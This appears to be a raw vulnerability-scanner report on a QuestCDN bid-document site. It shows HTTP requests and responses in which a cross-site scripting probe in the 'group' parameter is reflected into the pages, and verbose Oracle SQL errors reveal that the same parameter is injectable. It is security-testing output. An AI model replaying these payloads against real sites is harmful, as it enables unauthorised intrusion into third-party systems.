AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = '"--></style></script><script>netsparker(0x000176)</script> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x000176)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:57 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:59 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10067
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000176%29%3C%2Fscript%3E&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000176%29%3C%2Fscript%3E&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000176%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:59.813 [ 1] (TP-Processor1654) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = '"--></style></script><script>netsparker(0x000176)</script> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x000176)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | '"--></style></script><script>alert(0x000179)</script> |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:59 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:59 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10259
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000179%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000179%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000179%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:59.833 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = '"--></style></script><script>netsparker(0x000179)</script> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x000179)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:59 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:59 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10259
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000179%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000179%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000179%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:59.833 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = '"--></style></script><script>netsparker(0x000179)</script> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at 